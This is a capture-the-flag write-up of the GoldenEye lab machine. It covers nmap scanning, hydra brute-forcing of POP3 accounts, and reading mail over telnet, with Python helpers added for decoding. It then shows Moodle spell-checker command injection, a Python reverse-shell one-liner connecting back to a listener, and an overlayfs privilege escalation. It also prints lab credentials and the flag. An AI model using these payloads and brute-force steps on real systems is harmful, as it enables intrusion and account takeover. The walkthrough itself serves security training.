Last updated: 15 Apr 24 09:28:37 (UTC)

Write-Up Golden-Eye

Golden-Eye

By Lawcky 27/12/2023

Introduction

Golden-Eye is inspired by the James Bond film series.

Difficulty : medium

Additional info:

Name: GoldenEye: 1
Date release: 4 May 2018
Author: creosote
Series: GoldenEye

NOTE: the full scan outputs are not copied here as they would be far too voluminous; see the separately linked scan output.


In this write-up

  • Hydra
  • strings
  • nmap
  • nikto
  • telnet for POP3
  • burpsuite
  • python RCE

Write-Up

First approach

98ddc0ba21190a6a9da93fb31143d02f.png

On /sev-home we are asked for credentials.

d9b34ad177502b14cf2f0e15ab4cb83b.png

The answer is in the source code of the root page, in the terminal.js file.

88e6f1d4739410015f83eb3c3f81ff43.png

The password is stored as HTML numeric character references (&#NNN;); decoding it with Burp's Decoder gives:

a06ee2cd3d366d80e1f4fad5bef3d29f.png

boris:InvincibleHack3r
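The same decoding without Burp, as an added example that is not part of the original write-up: it scans a JavaScript source for runs of HTML numeric character references and decodes each run. SAMPLE_JS is constructed for the demo and is not the real terminal.js from the box; the function and variable names are the example's own.

```python
"""Locate and decode runs of HTML numeric character references in a JS source.

Added example for this write-up (not the page's own code and not Burp): the
boris credential in terminal.js was stored as a run of &#NNN; entities, which is
what the page's Burp Decoder step recovered. SAMPLE_JS below is constructed for
the demo and is not the real terminal.js from the box.
"""
import html
import re

# One or more consecutive numeric character references, decimal (&#73;) or hex (&#x49;).
ENTITY_RUN = re.compile(r"(?:&#(?:[0-9]+|[xX][0-9a-fA-F]+);)+")

# Constructed sample: a JS file with two entity-encoded strings and ordinary text around them.
SAMPLE_JS = """// constructed sample, not the real terminal.js
var data = {
  title: "GoldenEye Terminal",
  hint:  "the password is &#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;",
  other: "&#x48;&#x69;"
};
"""


def find_entity_runs(text, min_refs=2):
    """Return every run of at least `min_refs` consecutive numeric references."""
    runs = []
    for m in ENTITY_RUN.finditer(text):
        run = m.group(0)
        if run.count(";") >= min_refs:   # each reference ends with exactly one ';'
            runs.append(run)
    return runs


def decode_entities(run):
    """Decode a run of character references to the text it spells out."""
    return html.unescape(run)


def extract_hidden_strings(text, min_refs=2):
    """Decode every entity run in `text`; single isolated references are skipped as noise."""
    return [decode_entities(r) for r in find_entity_runs(text, min_refs)]


if __name__ == "__main__":
    for secret in extract_hidden_strings(SAMPLE_JS):
        print(secret)
```

Point it at a real file with `extract_hidden_strings(open("terminal.js").read())`; the `min_refs` threshold exists because a lone `&#169;` in ordinary markup is not a hidden string.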


nmap

367c627f4c57f9d40f150ecada5c901f.png

We run an nmap scan on all 65535 ports to find the port used by POP3, then fingerprint the services on the two high ports it reports:

nmap -p- gold.eye

nmap -sV -p 55006,55007 gold.eye

3da6fa084133dfa6aa385d561508eac2.png

Port 55007 is POP3.


hydra

nikto found a page at gold.eye/splashAdmin.php.
On this page we see several usernames: boris, natalya, janus, admin, and a mention of xenia. Using the fasttrack.txt wordlist and hydra we can try to brute-force a POP3 password for each of these users (-L takes the user list, -P the password list; the pop3:// URL form carries the non-default port):

hydra -L names.txt -P fasttrack.txt pop3://gold.eye:55007/

cf62089ff0108aa3b6e98ed833145ead.png

37957a44940bcd9cee16f7aa4d8c9589.png


POP3

We read their mail by hand over telnet: USER and PASS to log in, LIST to enumerate the messages and their sizes, RETR n to read message n.

For boris:

telnet gold.eye 55007

USER boris

PASS secret1!

LIST

RETR 3

5559eae6d4c952cef8262295cadbe063.png

For natalya:

telnet gold.eye 55007

USER natalya

PASS bird

LIST

RETR 2

5bcff97b885d03efffe222af6684c5a6.png
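The telnet session above scripted in Python, as an added example that is not part of the original write-up: the same USER/PASS, LIST and RETR exchange, with every message retrieved and parsed. Given host, port, user and password on the command line it uses the standard library's poplib against the real server (gold.eye:55007 and the hydra credentials are the assumed inputs); with no arguments it runs against FakePOP3, a constructed in-memory stand-in with made-up messages, so it can be run offline.

```python
"""Read every message in a POP3 mailbox, scripting what the telnet session above does by hand.

Added example for this write-up, not the page's own code. With arguments
(host port user password, e.g. gold.eye 55007 boris 'secret1!') it talks to the
real server with Python's poplib; with no arguments it runs the same logic against
FakePOP3, a constructed in-memory stand-in, so the example works offline.
"""
import email
import poplib
import sys


class FakePOP3:
    """Constructed stand-in for poplib.POP3 exposing only the methods used here."""
    MAILBOX = {"boris": "secret1!"}  # constructed credential, same shape as hydra's output
    MESSAGES = [                     # constructed RFC 822 messages, not the box's real mail
        b"From: root@example.test\r\nTo: boris\r\nSubject: constructed test message 1\r\n\r\nbody one\r\n",
        b"From: natalya@example.test\r\nTo: boris\r\nSubject: constructed test message 2\r\n\r\nbody two\r\n",
    ]

    def __init__(self):
        self._user = None
        self._authed = False

    def user(self, name):
        self._user = name
        return b"+OK"

    def pass_(self, password):
        if self.MAILBOX.get(self._user) != password:
            raise poplib.error_proto(b"-ERR [AUTH] Authentication failed.")
        self._authed = True
        return b"+OK Logged in."

    def list(self):
        if not self._authed:
            raise poplib.error_proto(b"-ERR Unknown command.")
        sizes = [b"%d %d" % (i, len(m)) for i, m in enumerate(self.MESSAGES, 1)]
        return b"+OK", sizes, sum(len(s) for s in sizes)

    def retr(self, num):
        if not self._authed:
            raise poplib.error_proto(b"-ERR Unknown command.")
        raw = self.MESSAGES[num - 1]
        return b"+OK", raw.split(b"\r\n"), len(raw)

    def quit(self):
        return b"+OK Logging out."


def dump_mailbox(client, user, password):
    """USER/PASS, then LIST and RETR every message; returns parsed messages in order."""
    client.user(user)
    client.pass_(password)            # poplib raises error_proto on any -ERR reply
    _, listing, _ = client.list()     # entries look like b"1 1245" (number, octets)
    messages = []
    for entry in listing:
        num = int(entry.split()[0])
        _, lines, _ = client.retr(num)
        msg = email.message_from_bytes(b"\r\n".join(lines))
        body = msg.get_payload(decode=True) or b""
        messages.append({
            "num": num,
            "from": msg["From"],
            "subject": msg["Subject"],
            "body": body.decode("utf-8", "replace").strip(),
        })
    client.quit()
    return messages


def try_mailbox(factory, user, password):
    """Open a fresh connection via `factory`; returns None when the server rejects the login."""
    client = factory()
    try:
        return dump_mailbox(client, user, password)
    except poplib.error_proto:
        return None


if __name__ == "__main__":
    if len(sys.argv) == 5:
        host, port, user, password = sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4]
        factory = lambda: poplib.POP3(host, port, timeout=10)
    else:
        user, password, factory = "boris", "secret1!", FakePOP3
    result = try_mailbox(factory, user, password)
    if result is None:
        print("login failed for", user)
    for m in result or []:
        print("[%d] From: %s | Subject: %s\n%s\n" % (m["num"], m["from"], m["subject"], m["body"]))
```

Running it once per credential pair that hydra found replaces four manual telnet sessions; a -ERR on PASS is reported as a failed login rather than aborting the whole loop.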

The mail mentions a hostname; we add it to /etc/hosts and browse to that site.


Moodle

f4f21fbd2422e49fb08ce2ebcf95d8e4.png

17d1a3be5d5c775fdf8ec0c2a4343c21.png

In xenia's Moodle messages we find another username, doak. We brute-force his mailbox the same way:

hydra -l doak -P fasttrack.txt pop3://192.168.1.87:55007/

5141456bac7dff905ccc12d83355a68b.png

67041d8a7d1d523c504060e5e0d13211.png

be7f78023cd572b9bdb9c736117ac39b.png

7ea055ada607cafbe7588cb9d8d8cb3e.png


Admin password

61b6b83dfaaebba19251e91f1da9330b.png

Here is the content of the page. Running the Linux strings command on the image it contains:

0c2ecf159b3f38bdba64b162758a9f0c.png

1b6ac6e2a06bd4ff922d7449c2c596ed.png

The password was hidden in the image as a base64-encoded string (encoded, not encrypted: base64 is reversible without any key, which is why strings plus a decoder is enough to recover it).

admin:xWinter1995x!
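The strings-then-decode step in one pass, as an added example that is not part of the original write-up: it emulates strings(1) on a binary blob and decodes every base64-looking token that yields printable text, which filters out the random binary runs that happen to look like base64. SAMPLE_IMAGE is a constructed JPEG-shaped blob with a base64 string in a metadata-like field, not the real image from the box.

```python
"""Emulate `strings` on a binary file and decode any base64 token that yields printable text.

Added example for this write-up, not the page's own code. It reproduces the page's
strings-then-base64-decode step in one pass. SAMPLE_IMAGE is a constructed blob
shaped like a JPEG with a base64 string in its metadata, not the real image from the box.
"""
import base64
import binascii
import re

# What `strings` prints by default: runs of printable ASCII at least min_len long.
PRINTABLE_RUN = rb"[\x20-\x7e]{%d,}"
# A base64 token: alphabet chars, then up to two '=' of padding. 16+ chars filters short words.
B64_TOKEN = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")

SAMPLE_IMAGE = (
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01"        # JPEG-like header
    + bytes(range(256))                             # binary noise, including one long printable run
    + b"\x00Comment: eFdpbnRlcjE5OTV4IQ== \x00"    # base64 hidden in a metadata-like field
    + b"\x00AAAAAAAAAAAAAAAA\x01\x02"               # valid base64, but decodes to non-text
    + b"\xff\xd9"
)


def strings(data, min_len=4):
    """Return printable ASCII runs of at least `min_len` bytes, like the strings(1) default."""
    return re.findall(PRINTABLE_RUN % min_len, data)


def decode_if_text(token):
    """Decode a base64 token; return the text only if it is valid base64 and all printable."""
    if len(token) % 4:                  # padded base64 is always a multiple of 4 chars
        return None
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    if raw and all(0x20 <= b < 0x7f for b in raw):
        return raw.decode("ascii")
    return None


def find_base64_secrets(data, min_len=16):
    """(token, decoded) pairs for every string in `data` that is base64 of printable text."""
    found = []
    for s in strings(data, min_len):
        for m in B64_TOKEN.finditer(s):
            decoded = decode_if_text(m.group(0))
            if decoded is not None:
                found.append((m.group(0).decode("ascii"), decoded))
    return found


if __name__ == "__main__":
    for token, text in find_base64_secrets(SAMPLE_IMAGE):
        print("%s -> %s" % (token, text))
```

On a real file, `find_base64_secrets(open("image.jpg", "rb").read())` does what `strings image.jpg` followed by eyeballing and `base64 -d` did by hand; the printable-only check is what keeps JPEG entropy from showing up as false positives.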

RCE

In Moodle's site administration, the spell-checker settings let us set the path to the spell-checking binary. Pointing that path at an arbitrary command makes the web server execute it whenever the spell checker is invoked, which gives us RCE on the server.

1c20eb42c496ab099ceb8748ca6376da.png

First start a listener on the attacking machine:

nc -lnvp 4444

then set the path to the following payload (192.168.1.253 is the listener's IP) and trigger a spell check from the editor; the server runs the payload and the shell connects back:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.253",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

b3049902007dc73f24ce7a37a4c7d914.png


Upgrade the shell to a full TTY:

python3 -c 'import pty; pty.spawn("/bin/bash")'

then press Ctrl-Z and, back in the local shell, run: stty raw -echo && fg

export TERM=xterm-256color

Privilege escalation using overlayfs

We serve the overlayfs exploit source from our machine with Python's http.server module, download it on the target, compile it there and execute it.

4c81eb41813fd0ba572d02ce68b91383.png


Flag

cat /root/.flag.txt
568628e0d993b1973adc718237da6e93

d71d777424a5b68d4b2493a64bf81d46.png

58193a37905582993ee9e5e5152b714f.png